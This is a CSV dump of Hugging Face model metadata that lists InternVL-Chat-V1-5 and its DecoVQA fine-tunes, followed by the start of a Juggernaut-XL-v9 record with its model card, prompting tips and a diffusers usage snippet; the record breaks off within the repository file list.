""RepoSibling(rfilename='examples/image1.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='examples/image2.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='examples/red-panda.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='model-00003-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_intern_vit.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_internvl_chat.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Apr15_22-00-14_SH-IDC1-10-140-37-13/events.out.tfevents.1713190241.SH-IDC1-10-140-37-13.10620.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2_fast.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Forkei/OpenGVL"", ""minhdang/DeepSeek-VL-7B"", ""Nechama/new_app"", ""woak-oa/DeepDubber-V1""], ""safetensors"": {""parameters"": {""BF16"": 25514186112}, ""total"": 25514186112}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-25 05:44:05+00:00"", ""cardData"": ""base_model:\n- OpenGVLab/InternViT-6B-448px-V1-5\n- internlm/internlm2-chat-20b\nlanguage:\n- multilingual\nlibrary_name: transformers\nlicense: mit\npipeline_tag: image-text-to-text\ntags:\n- internvl\n- custom_code\nnew_version: OpenGVLab/InternVL2_5-26B\nbase_model_relation: merge"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_internvl_chat.InternVLChatModel"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""_id"": ""6620d4d40e8d8b41b2cfbf74"", ""modelId"": ""OpenGVLab/InternVL-Chat-V1-5"", ""usedStorage"": 51032846160}",0,"https://huggingface.co/freesky/InternVL-Chat-V1-5_ft_by_DecoVQA, https://huggingface.co/freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus, https://huggingface.co/freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss",3,https://huggingface.co/empower-dev-staging/internvl-v1-5-sv-v0-llm-only-2-1-1k-filter-on-num-steps-adapter,1,https://huggingface.co/OpenGVLab/InternVL-Chat-V1-5-AWQ,1,,0,"Forkei/OpenGVL, Nechama/new_app, OpenGVLab/InternVL, huggingface/InferenceSupport/discussions/455, minhdang/DeepSeek-VL-7B, woak-oa/DeepDubber-V1",6
freesky/InternVL-Chat-V1-5_ft_by_DecoVQA,"---
license: mit
language:
- en
base_model:
- OpenGVLab/InternVL-Chat-V1-5
pipeline_tag: visual-question-answering
---

## Citation

If you use this finetuned model checkpoint in your research, please cite our paper as follows:

```bibtex
@misc{zhang2024visualquestiondecompositionmultimodal,
  title={Visual Question Decomposition on Multimodal Large Language Models},
  author={Haowei Zhang and Jianzhe Liu and Zhen Han and Shuo Chen and Bailan He and Volker Tresp and Zhiqiang Xu and Jindong Gu},
  year={2024},
  eprint={2409.19339},
  archivePrefix={arXiv},
  primaryClass={cs.CL},
  url={https://arxiv.org/abs/2409.19339},
}
```","{""id"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQA"", ""author"": ""freesky"", ""sha"": ""a2a70d5e7adbc0dc3c14e2998592209fad734689"", ""last_modified"": ""2024-10-06 18:32:05+00:00"", ""created_at"": ""2024-09-20 13:31:30+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""internvl_chat"", ""visual-question-answering"", ""custom_code"", ""en"", ""arxiv:2409.19339"", ""base_model:OpenGVLab/InternVL-Chat-V1-5"", ""base_model:finetune:OpenGVLab/InternVL-Chat-V1-5"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""InternVLChatModel""], ""auto_map"": {""AutoConfig"": ""configuration_internvl_chat.InternVLChatConfig"", ""AutoModel"": ""modeling_internvl_chat.InternVLChatModel"", ""AutoModelForCausalLM"": ""modeling_internvl_chat.InternVLChatModel""}, ""model_type"": ""internvl_chat"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{{ bos_token }}{% for message in messages %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='all_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2.py', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='trainer_state.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_log.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 25525196160}, ""total"": 25525196160}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-06 18:32:05+00:00"", ""cardData"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""transformersInfo"": null, ""_id"": ""66ed7932453e1d0535d2b476"", ""modelId"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQA"", ""usedStorage"": 51052012317}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=freesky/InternVL-Chat-V1-5_ft_by_DecoVQA&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bfreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQA%5D(%2Ffreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQA)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus,"---
license: mit
pipeline_tag: visual-question-answering
language:
- en
base_model:
- OpenGVLab/InternVL-Chat-V1-5
---
## Citation

If you use this finetuned model checkpoint in your research, please cite our paper as follows:

```bibtex
@misc{zhang2024visualquestiondecompositionmultimodal,
  title={Visual Question Decomposition on Multimodal Large Language Models},
  author={Haowei Zhang and Jianzhe Liu and Zhen Han and Shuo Chen and Bailan He and Volker Tresp and Zhiqiang Xu and Jindong Gu},
  year={2024},
  eprint={2409.19339},
  archivePrefix={arXiv},
  primaryClass={cs.CL},
  url={https://arxiv.org/abs/2409.19339},
}
```","{""id"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus"", ""author"": ""freesky"", ""sha"": ""f04b0efb0c91055d852d51045db2eba674f58e18"", ""last_modified"": ""2024-10-06 18:33:21+00:00"", ""created_at"": ""2024-09-20 21:30:57+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 1, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""internvl_chat"", ""visual-question-answering"", ""custom_code"", ""en"", ""arxiv:2409.19339"", ""base_model:OpenGVLab/InternVL-Chat-V1-5"", ""base_model:finetune:OpenGVLab/InternVL-Chat-V1-5"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""InternVLChatModel""], ""auto_map"": {""AutoConfig"": ""configuration_internvl_chat.InternVLChatConfig"", ""AutoModel"": ""modeling_internvl_chat.InternVLChatModel"", ""AutoModelForCausalLM"": ""modeling_internvl_chat.InternVLChatModel""}, ""model_type"": ""internvl_chat"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{{ bos_token }}{% for message in messages %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='all_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2.py', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='trainer_state.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_log.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 25525196160}, ""total"": 25525196160}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-06 18:33:21+00:00"", ""cardData"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""transformersInfo"": null, ""_id"": ""66ede991afa27ebdac9e76e6"", ""modelId"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus"", ""usedStorage"": 51052012317}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bfreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQAplus%5D(%2Ffreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQAplus)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss,"---
license: mit
language:
- en
base_model:
- OpenGVLab/InternVL-Chat-V1-5
pipeline_tag: visual-question-answering
---
## Citation

If you use this finetuned model checkpoint in your research, please cite our paper as follows:

```bibtex
@misc{zhang2024visualquestiondecompositionmultimodal,
  title={Visual Question Decomposition on Multimodal Large Language Models},
  author={Haowei Zhang and Jianzhe Liu and Zhen Han and Shuo Chen and Bailan He and Volker Tresp and Zhiqiang Xu and Jindong Gu},
  year={2024},
  eprint={2409.19339},
  archivePrefix={arXiv},
  primaryClass={cs.CL},
  url={https://arxiv.org/abs/2409.19339},
}
```","{""id"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss"", ""author"": ""freesky"", ""sha"": ""9a135222b97e214f8794352e2adec1f78ca107c7"", ""last_modified"": ""2024-10-06 18:32:36+00:00"", ""created_at"": ""2024-09-20 22:51:27+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""internvl_chat"", ""visual-question-answering"", ""custom_code"", ""en"", ""arxiv:2409.19339"", ""base_model:OpenGVLab/InternVL-Chat-V1-5"", ""base_model:finetune:OpenGVLab/InternVL-Chat-V1-5"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""InternVLChatModel""], ""auto_map"": {""AutoConfig"": ""configuration_internvl_chat.InternVLChatConfig"", ""AutoModel"": ""modeling_internvl_chat.InternVLChatModel"", ""AutoModelForCausalLM"": ""modeling_internvl_chat.InternVLChatModel""}, ""model_type"": ""internvl_chat"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{{ bos_token }}{% for message in messages %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='all_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2.py', size=None, blob_id=None, 
lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='trainer_state.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_log.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 25525196160}, ""total"": 25525196160}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-06 18:32:36+00:00"", ""cardData"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""transformersInfo"": null, ""_id"": ""66edfc6fcaf6968847a7294d"", ""modelId"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss"", ""usedStorage"": 51052012317}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bfreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss%5D(%2Ffreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
Juggernaut-XL-v9_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
@@ -0,0 +1,69 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
RunDiffusion/Juggernaut-XL-v9,"---
language:
- en
license: creativeml-openrail-m
library_name: diffusers
tags:
- art
- people
- diffusion
- Cinematic
- Photography
- Landscape
- Interior
- Food
- Car
- Wildlife
- Architecture
thumbnail: >-
  https://imagedelivery.net/siANnpeNAc_S2q1M3-eDrA/c200a026-c151-49c7-afbc-241fe943b300/padthumb
base_model: stabilityai/stable-diffusion-xl-base-1.0
pipeline_tag: text-to-image
---

# Juggernaut XL v9 + RunDiffusion Photo v2 Official
[](https://rundiffusion.com)
Check out the team behind this amazing model! We're happy to help you build your AI models!

This model is not permitted to be used behind API services. Please contact [juggernaut@rundiffusion.com](mailto:juggernaut@rundiffusion.com) for business inquiries, commercial licensing, custom models, and consultation.

Juggernaut is available on the new Auto1111 Forge on [RunDiffusion](http://rundiffusion.com/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo)

A big thanks for Version 9 goes to [RunDiffusion](http://rundiffusion.com/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo) ([Photo Model](https://rundiffusion.com/rundiffusion-photo/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo)) and [Adam](https://twitter.com/Colorblind_Adam), who diligently helped me test :) (Leave some love for them ;) )

It's time for another round, this time a bit delayed, but I hope you forgive the delay. Let's dive straight into the changes that await you and what we've been working on lately:

For V9, I myself have only done basic training. This involves some work on skin details, lighting, and overall contrast. However, the biggest change to the model came from the [RunDiffusion Photo Model](https://rundiffusion.com/rundiffusion-photo/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo) update, which was made available to me in V2 by [RunDiffusion.com](https://rundiffusion.com/?utm_source=huggingface&utm_medium=referral&utm_campaign=Kandoo). The photographic output of the model should, in our experience, be even stronger than in previous versions.

Now for a small "roadmap" update, or a general status update on how things are progressing with Juggernaut. As you may have noticed, there was a slight delay with V9. With each successive version, it has become increasingly difficult to train Juggernaut without sacrificing quality in some areas, which was already the case to some extent with V8. Don't worry, V9 is really good, and I'm satisfied with the version I can present to you today :) However, I've decided to go for a complete "reboot" for V10. I want to simply retrain the Juggernaut base set. The conditions for better captioning weren't as favorable "back then" as they are today, so I want to completely re-caption the base set (5k images) with GPT-4 Vision. I expect a big leap in prompting guidance and quality.

But as you surely noticed last week, the release of Stable Cascade got in the way a bit. Therefore, my focus in the coming weeks will be on training Juggernaut for Stable Cascade. The approach remains the same as with the planned "reboot"; I want to caption/tag all images in the future only with GPT-4 or manually. The timeline for all of this is still uncertain. I hope to be able to present you with a first stable version of Juggernaut Cascade sometime in March. V10 of Juggernaut XL will follow in the weeks thereafter.

Now, here are some additional tips to make prompting easier for you (a diffusers sketch of these settings follows the keyword list below):

- Res: 832x1216
- Sampler: DPM++ 2M Karras
- Steps: 30-40
- CFG: 3-7 (less is a bit more realistic)
- Negative: Start with no negative prompt, and afterwards add the stuff you don't want to see in the image. I don't recommend using my negative prompt; I simply use it because I am lazy :D

The VAE is already baked in.
HiRes: 4xNMKD-Siax_200k with 15 steps, 0.3 denoise, and 1.5x upscale.
And here are a few keywords/tokens that I regularly use in training, which might help you achieve the optimal result from this version:

- Architecture Photography
- Wildlife Photography
- Car Photography
- Food Photography
- Interior Photography
- Landscape Photography
- Hyperdetailed Photography
- Cinematic Movie
- Still Mid Shot Photo
- Full Body Photo
- Skin Details

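The settings above map onto diffusers roughly as follows. A minimal sketch, assuming the fp16 weights hosted in this repo and approximating "DPM++ 2M Karras" with `DPMSolverMultistepScheduler(use_karras_sigmas=True)`; the prompt is just an illustration:

```python
import torch
from diffusers import StableDiffusionXLPipeline, DPMSolverMultistepScheduler

pipe = StableDiffusionXLPipeline.from_pretrained(
    'RunDiffusion/Juggernaut-XL-v9', torch_dtype=torch.float16, variant='fp16'
).to('cuda')
# Approximate the recommended "DPM++ 2M Karras" sampler
pipe.scheduler = DPMSolverMultistepScheduler.from_config(
    pipe.scheduler.config, use_karras_sigmas=True)

# Recommended resolution, steps, and CFG from the tips above
image = pipe('Hyperdetailed Photography, full body photo of a hiker at sunrise, skin details',
             width=832, height=1216,
             num_inference_steps=35, guidance_scale=4.0).images[0]
image.save('juggernaut_v9_sample.png')
```
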
","{""id"": ""RunDiffusion/Juggernaut-XL-v9"", ""author"": ""RunDiffusion"", ""sha"": ""b2d4ff8089889ad0a63a2f93a14e2cf6059bfdbb"", ""last_modified"": ""2024-12-11 19:56:01+00:00"", ""created_at"": ""2024-02-18 21:05:03+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 173208, ""downloads_all_time"": null, ""likes"": 195, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""art"", ""people"", ""diffusion"", ""Cinematic"", ""Photography"", ""Landscape"", ""Interior"", ""Food"", ""Car"", ""Wildlife"", ""Architecture"", ""text-to-image"", ""en"", ""base_model:stabilityai/stable-diffusion-xl-base-1.0"", ""base_model:finetune:stabilityai/stable-diffusion-xl-base-1.0"", ""license:creativeml-openrail-m"", ""autotrain_compatible"", ""endpoints_compatible"", ""diffusers:StableDiffusionXLPipeline"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: stabilityai/stable-diffusion-xl-base-1.0\nlanguage:\n- en\nlibrary_name: diffusers\nlicense: creativeml-openrail-m\npipeline_tag: text-to-image\ntags:\n- art\n- people\n- diffusion\n- Cinematic\n- Photography\n- Landscape\n- Interior\n- Food\n- Car\n- Wildlife\n- Architecture\nthumbnail: https://imagedelivery.net/siANnpeNAc_S2q1M3-eDrA/c200a026-c151-49c7-afbc-241fe943b300/padthumb"", ""widget_data"": null, ""model_index"": null, ""config"": {""diffusers"": {""_class_name"": ""StableDiffusionXLPipeline""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Juggernaut-XL_v9_RunDiffusionPhoto_v2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model_index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='scheduler/scheduler_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder_2/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder_2/model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_2/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_2/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_2/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_2/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.fp16.safetensors', size=None, blob_id=None, 
